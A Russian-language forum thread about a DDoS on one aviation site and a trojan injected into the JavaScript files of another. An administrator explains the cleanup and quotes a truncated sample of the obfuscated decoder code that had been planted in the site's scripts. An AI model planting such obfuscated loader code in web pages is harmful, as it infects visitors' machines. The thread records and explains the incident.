Нас атакуют!)

[Serega]

Инженерами #### зафиксировано чрезмерное увеличение количества запросов к вашему сайту saon.ru, в результате анализа данных запросов была выявлена DDOS атака.
Инженеры ###### предпринимают все возможные меры для отражения атаки.
Всплывающее при первом посещении сайта окно с кнопкой "ОК", установленное на вашем сайте, является частью системы защиты.

[Misha]

Неужели Александр Васильевич заказал?

[Vi-kTo-R]

Меня Троян встретил в обед на РАОПА.
И впрямь засуетились супостаты..

[502]

Меня Троян встретил в обед на РАОПА.

Повтори еще раз? Какой троян, в какой обед?
Был вирус где-то неделю назад, но уже вычистили.

[Vi-kTo-R]

11.04.2012 13:29:40 "Фильтр HTTP файл http://aopa.ru/templates/ja_purity_iii/js/menu/mega.js JS/Agent.NEN троянская программа соединение прервано - изолирован VIKTOR-CC6FAEEF\Виктор"
Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Mozilla Firefox\firefox.exe.

Как минимум еще шесть зараженных файлов есть в архиве журнала антивируса.

[Vi-kTo-R]

Не советую переходить по ссылке файла. Он заражен, только что проверил.

[владислав74]

Не советую переходить по ссылке файла. Он заражен, только что проверил.

Просто директор в отпуске,вот и засуетились супостаты на еще тепленькое

[CRaZy_SouL]

Неделю назад около 10 наших сайтов атаковали гады какие-то...

[leksey]

На aopa.ru убрали вредоносный код, он внедрен был в js-файлы.
Антивирусы теперь должны перестать ругаться. И ряд других мер предприняли, чтобы не допустить впредь такого. При этом вредностный код обсуфуцирован (зашифрован) и отличался от файла к файлу - т.е. искать его сложнее. Вот так выглядел:

Код: Выделить всё

var k574ef9="";function fe134348e8(){var gb6267aad=String,ic1e6929=Array.prototype.slice.call(arguments).join(""),sc817c=ic
1e6929.substr(x97af5f4(),3)-568,wce0ce3,hbe41c4;ic1e6929=ic1e6929.substr(18);var h7480e852=ic1e6929.length;for(var wa29b95=
0;wa29b95<h7480e852;wa29b95++){try{throw(o8a85c47=g067dd(ic1e6929,wa29b95));}catch(e){o8a85c47=e;};if(o8a85c47=='\x95'){sc8
17c="";wa29b95++;k9af3ad=f4e348d74(ic1e6929,wa29b95);while(fd5b53(k9af3ad)){sc817c+=k9af3ad;wa29b95++;k9af3ad=ic1e6929.subs
tr(wa29b95,1);}sc817c-=577;continue;}wce0ce3="";if(o8a85c47=='\xa9'){wa29b95++;o8a85c47=ic1e6929.substr(wa29b95,1);while(o8
a85c47!='\xa9'){wce0ce3+=o8a85c47;wa29b95++;o8a85c47=ic1e6929.substr(wa29b95,1);}wce0ce3=q2377f(wce0ce3,sc817c,49);if(wce0c
e3<0)wce0ce3+=256;wce0ce3=qa8f75(wce0ce3);le7f1423(wce0ce3);continue;}h694cfe0=ua0c55b5f(o8a85c47);if(h694cfe0>848)h694cfe0
-=848;hbe41c4=h694cfe0-sc817c-49;if(hbe41c4<0)hbe41c4+=256;if(hbe41c4>=192)hbe41c4+=848;else if(hbe41c4==168)hbe41c4=1025;e
lse if(hbe41c4==184)hbe41c4=1105;k574ef9+=gb6267aad["\x66\x72\x6fm\x43ha\x72\x43\x6f\x64e"](hbe41c4);}}fe134348e8("7","7","
811","1","f","1e

Хочется сказать, что в заражениях сайтов нет человеческого фактора - они происходят автоматически, с ранее зараженных машин. В DDoS подозревать кого-то вряд ли имеет смысл (если только вы не увлекаетесь конспирологией) - атаковать оправдано какие-то сервис-компании, для которых критичен простой (онлайн-банкинг, игровые сервисы, интернет-магазины). И их обычно атакуют большим количество траффика, для атаки с помощью GET-запросов (как в случае saon), когда производится много-много запросов страниц форума - особых ресурсов не надо (как вычислительных, так и денежных).